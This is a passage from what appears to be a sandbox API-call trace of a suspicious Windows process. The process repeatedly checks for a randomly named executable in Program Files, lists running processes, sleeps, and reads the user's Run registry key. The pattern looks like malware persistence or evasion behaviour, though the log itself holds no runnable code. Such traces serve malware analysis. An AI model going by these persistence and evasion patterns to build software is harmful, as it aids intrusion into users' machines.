IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.093] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700808) returned 1 [0171.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.093] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.093] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7004c0) returned 1 [0171.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.176] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.217] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.218] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.218] NtClose (Handle=0x270) returned 0x0 [0171.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.218] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.218] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7008f8) returned 1 [0171.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.218] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.218] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff98) returned 1 [0171.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.243] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.244] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.244] NtClose (Handle=0x270) returned 0x0 [0171.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.244] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.244] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700790) returned 1 [0171.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.244] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.245] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700538) returned 1 [0171.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.268] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.269] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.269] NtClose (Handle=0x270) returned 0x0 [0171.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.269] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.270] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700088) returned 1 [0171.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.270] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.270] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffdb8) returned 1 [0171.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.316] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.318] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.318] NtClose (Handle=0x270) returned 0x0 [0171.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.318] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.318] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700790) returned 1 [0171.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.318] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.319] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7009e8) returned 1 [0171.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.340] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.342] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.342] NtClose (Handle=0x270) returned 0x0 [0171.342] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.342] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.342] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7003d0) returned 1 [0171.342] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.342] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.342] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7003d0) returned 1 [0171.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.373] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.375] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.375] NtClose (Handle=0x270) returned 0x0 [0171.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.375] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.375] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700088) returned 1 [0171.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.375] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.375] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff98) returned 1 [0171.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.399] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 